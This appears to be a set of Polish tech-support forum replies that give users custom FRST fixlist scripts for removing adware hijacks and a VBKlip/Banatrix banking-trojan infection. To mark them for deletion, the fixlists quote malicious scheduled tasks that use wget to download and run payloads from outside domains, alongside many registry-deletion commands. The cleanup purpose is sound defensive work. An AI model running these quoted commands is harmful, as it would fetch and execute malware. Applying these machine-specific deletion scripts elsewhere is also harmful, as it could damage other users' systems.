hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> D:\programy\firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - iexplore.exe C:\Program Files (x86)\BorderlineMaker C:\Program Files (x86)\Google C:\Program Files (x86)\PrinceCiouPone C:\Program Files (x86)\RelaySys C:\Program Files (x86)\SoftwarePlus C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf C:\ProgramData\2a617352-d396-46a3-a71b-5d89535356cf C:\ProgramData\3164dfc000001c67 C:\ProgramData\7564552405782015561 C:\ProgramData\aea8cc93-2213-47cf-a265-0391e3461dbb C:\ProgramData\kijgeebfcmjjkffjllnbechheibhhbke C:\ProgramData\MailUpdate C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Advanced Warfare C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SkypEmoticons C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoRotator C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinISD beta C:\Users\mateusz\AppData\Local\69ff07055291669bb2b218.72821112 C:\Users\mateusz\AppData\Local\Google C:\Users\mateusz\AppData\Local\icsxml C:\Users\mateusz\AppData\Local\Opera Software C:\Users\mateusz\AppData\Roaming\CYF C:\Users\mateusz\AppData\Roaming\GoldenGate C:\Users\mateusz\AppData\Roaming\MailUpdate C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\San Andreas Multiplayer.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Video Rotator.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\mateusz\AppData\Roaming\OpenCandy C:\Users\mateusz\AppData\Roaming\Opera Software C:\Users\mateusz\AppData\Roaming\Origin\update.vbe C:\Users\mateusz\AppData\Roaming\SkypeFall C:\Users\mateusz\AppData\Roaming\SkypEmoticons C:\Users\mateusz\Links\8 Ball Pool V10.lnk Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pola Addition + Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy wszystkie problemy ustąpiły.

Są tu dwa konta: ==================== Accounts: ============================= Kacper (S-1-5-21-2016024110-2163132575-2678418593-1001 - Administrator - Enabled) => C:\Users\Kacper Kacper_2 (S-1-5-21-2016024110-2163132575-2678418593-1005 - Administrator - Enabled) => C:\Users\Kacper_2 Dostarczyłeś raporty z konta Kacper. Logi FRST muszą być robione z każdego z kont z osobna, więc należy dostarczyć jeszcze zestaw będąc zalogowanym na Kacper_2 (logowanie poprzez pełny restart a nie opcje Wyloguj czy Przełącz użytkownika). Sprecyzuj też na którym koncie występuje problem reklam, czy może na obu. Wstępnie zaznaczę: w raportach na koncie Kacper nie widać żadnych oznak czynnego adware "Roll Around", a jeśli problem tyczy przeglądarki Google Chrome na tym koncie, to prawdopodobnie jest zainfekowany któryś globalny plik przeglądarki i trzeba będzie wykonać reinstalację browsera. Na razie dostarcz dane o które powyżej proszę.

W systemie jest wariant infekcji VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań. AdwCleaner nie nadaje się do usuwania takich infekcji. Dodatkowy problem to skutki pobytu innych infekcji typu adware - cała przeglądarka Google Chrome została przekonwertowana z wersji stabilnej do developerskiej i wymagana kompleksowa reinstalacja od zera. Działania do przeprowadzenia: 1. Odinstaluj zdefektowaną przeglądarkę Google Chrome, adware Image Downloader Plus oraz zbędny AVG Web TuneUp. Przed deinstalacją Chrome możesz wyeksportować zakładki, przy deinstalacji zaznacz Usuń także dane przeglądarki. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {024D2B1F-E3FD-4480-A24E-A137F47187DF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=rNeUiHGSrv;avg_isct_x64_all_2014_4745a8017.exe;1419765027 & start cmd /R dat.bmp Task: {18847BFA-6E53-449A-A62C-58BFC76EC40D} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=GlMhYSqEF4;up;1421863986 & start cmd /R dat.bmp Task: {AD6EFD0C-E8F6-4A25-9CBA-39EB81A1FEA9} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=u58NcYSj5B;up;1421863975 & start cmd /R dat.bmp HKU\S-1-5-21-1495383292-872571241-3386128745-1000\...\MountPoints2: {513c06f0-9262-11e4-a59d-002622ebb618} - G:\SETUP.EXE /AUTORUN CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKU\S-1-5-21-1495383292-872571241-3386128745-1000\Software\Microsoft\Internet Explorer\Main,Start Page = https://mysearch.avg.com/?cid={ED457F59-AAD2-4CF4-9536-EB952E6D8149}&mid=ed7145c1808247cdac51d16f640f5feb-3b249e40b8f31b7c2c567e14da7d3949258460bb&lang=pl&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-12-30 11:15:17&v=4.1.0.411&pid=wtu&sg=&sap=hp U4 Avgfwfd; system32\DRIVERS\avgfwd6a.sys [X] S2 vToolbarUpdater18.4.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.4.0\ToolbarUpdater.exe [X] C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\Windows\msdownld.tmp RemoveDirectory: C:\Users\TEMP Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt oraz logi z folderu C:\AdwCleaner (nie uruchamiaj narzędzia ponownie, chodzi o poprzednie wyniki).

Za opisywane zachowanie odpowiada pozycja "CMD" w starcie. Są też inne problemy do rozwiązania. Akcja: 1. Odinstaluj Adobe Flash Player 17 NPAPI (to wtyczka dla produktów Mozilla, których tu brak), odpadek Mozilla Maintenance Service oraz Pokki Download Helper. Również uruchom deinstalację pozycji Podstawowe programy Windows Live i w deinstalatorze wybierz komponent Windows Messenger - ten komunikator w ogóle już nie działa, zastąpił go Skype. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-251673657-1254408106-2500988348-1000\...\Run: [CMD] => cmd.exe /c start http://zenigameblinger.org && exit Task: {092AB6B0-CE39-4E68-9F8E-8486B116A1A8} - \Escolade No Task File Task: {3532CFDF-7718-4118-A50E-573A5AB9C513} - \EPUpdater No Task File Task: {4A6BDC9F-879E-4CD0-BE07-56A830702D6D} - System32\Tasks\{810220B7-FDAE-43A6-AC78-36A936A32D81} => pcalua.exe -a "E:\GRY\Hidden & Dangerous 2\hd2.exe" -d "E:\GRY\Hidden & Dangerous 2" Task: {6928C77D-AF3C-4D93-8BEC-3F09D8A5CF2D} - System32\Tasks\{7EFFE912-D9BF-4EEA-BF85-00B94E5D5190} => pcalua.exe -a C:\Users\qvvas\Downloads\games.for.windows.live_cw_downloader_9206_gry.exe -d C:\Users\qvvas\Downloads Task: {AAC6B21D-8065-4B60-877D-8E83D8090C90} - System32\Tasks\RunAsStdUser Task => C:\Users\qvvas\AppData\Local\Oxy\Application\oxy.exe Task: {DB7E317A-25AF-4DA3-9416-F21A93C1C347} - System32\Tasks\{213C9B63-F8B9-44BA-B5E9-30A0ADA6DB6D} => pcalua.exe -a C:\Users\qvvas\Downloads\DXWnd\dxwnd.exe -d C:\Users\qvvas\Downloads\DXWnd IFEO\bitguard.exe: [Debugger] tasklist.exe IFEO\bprotect.exe: [Debugger] tasklist.exe IFEO\bpsvc.exe: [Debugger] tasklist.exe IFEO\browserdefender.exe: [Debugger] tasklist.exe IFEO\browserprotect.exe: [Debugger] tasklist.exe IFEO\browsersafeguard.exe: [Debugger] tasklist.exe IFEO\dprotectsvc.exe: [Debugger] tasklist.exe IFEO\jumpflip: [Debugger] tasklist.exe IFEO\protectedsearch.exe: [Debugger] tasklist.exe IFEO\searchinstaller.exe: [Debugger] tasklist.exe IFEO\searchprotection.exe: [Debugger] tasklist.exe IFEO\searchprotector.exe: [Debugger] tasklist.exe IFEO\searchsettings.exe: [Debugger] tasklist.exe IFEO\searchsettings64.exe: [Debugger] tasklist.exe IFEO\snapdo.exe: [Debugger] tasklist.exe IFEO\stinst32.exe: [Debugger] tasklist.exe IFEO\stinst64.exe: [Debugger] tasklist.exe IFEO\umbrella.exe: [Debugger] tasklist.exe IFEO\utiljumpflip.exe: [Debugger] tasklist.exe IFEO\volaro: [Debugger] tasklist.exe IFEO\vonteera: [Debugger] tasklist.exe IFEO\websteroids.exe: [Debugger] tasklist.exe IFEO\websteroidsservice.exe: [Debugger] tasklist.exe S3 BRDriver64; \??\C:\ProgramData\BitRaider\BRDriver64.sys [X] S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X] S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X] S1 MpKsldda1d3a5; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{25DD5053-3A7E-47C1-A59A-BEC646E38ABC}\MpKsldda1d3a5.sys [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] CHR StartupUrls: Default -> "hxxp://www.default-search.net?sid=492&aid=221&itype=n&ver=12565&tm=386&src=hmp", "hxxp://www.default-search.net?sid=492&aid=221&itype=a&ver=12791&tm=386&src=hmp" SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope value is missing. SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} SearchScopes: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> {930C3C79-F264-46E5-AE27-EBF001D831C4} URL = http://www.idg.pl?q={searchTerms} SearchScopes: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} Toolbar: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - No File AlternateDataStreams: C:\Windows:4C1F7227F72BD04A C:\Program Files (x86)\Mozilla Firefox C:\Users\qvvas\AppData\Roaming\Microsoft\Windows\SendTo\DreamMail.lnk C:\Users\qvvas\AppData\Roaming\Microsoft\Windows\SendTo\The Bat!.LNK Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v AlcoholAutomount /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Clownfish /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "DAEMON Tools Lite" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Gyazo /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v KiesAirMessage /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v KiesPreload /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v RGSC /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v uTorrent /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Yontoo Desktop" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder /v Curse.lnk /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Nvtmru /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v AllShareAgent /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v CloneCDTray /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v "DT BEN" /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v KiesTrayAgent /f Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.